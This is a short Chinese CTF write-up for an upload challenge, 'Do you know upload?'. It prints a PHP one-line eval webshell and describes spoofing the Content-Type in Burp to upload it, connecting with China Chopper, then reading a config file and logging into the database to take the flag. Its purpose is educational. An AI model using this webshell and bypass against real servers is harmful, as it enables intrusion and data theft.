爱春秋-Do you know upload?

1、打开是一个上传的界面:



2、经测试,只能上传jpg文件,上传别的会显示文件类型错误。
3、上传一句话木马,使用burp抓包。

  <?php @eval($_POST['pass']);?>

改为image/jpeg

4、得到地址后用菜刀连接:



5、发现一个config文件,打开:




6、发现数据库,使用菜刀连接上这个数据库:

7、得到数据库,拿到flag。


总结:一句话木马+中国菜刀+数据库连接

一句话木马知识参考:https://blog.csdn.net/weixin_39190897/article/details/86772765

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 网络安全实验报告 第四章
    中国菜刀配合一句话木马基本使用 菜刀的主要功能是用来连接一句话木马的,asp、aspx、php的一句话菜刀都可以连...
    yingtaomj阅读 3,973评论 0 0
  • 文件上传(upload-labs详细全解)
    文件上传漏洞 常见的漏洞分类服务器配置不当导致文件上传开源编辑器存在上传漏洞本地文件上传限制可以上传被绕过服务器端...
    二潘阅读 17,274评论 2 3
  • 文件上传漏洞初探
    一、初步认识 1.上传功能:网站上各种可以上传文件,图片的地方可以被用作上传点进行非法上传 2.上传原理:在前端代...
    楠昭阅读 1,692评论 1 11
  • 文件上传漏洞
    文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直...
    付出从未后悔阅读 1,185评论 0 4
  • 64/365|在公共场合说小朋友的问题等同于扼杀
    今天在学校门口等人的时候,听到了一个妈妈在训斥她的小朋友,问他为什么到底有没写作业?小朋友支支吾吾的回答,让她不耐...
    独立感受世界阅读 113评论 0 2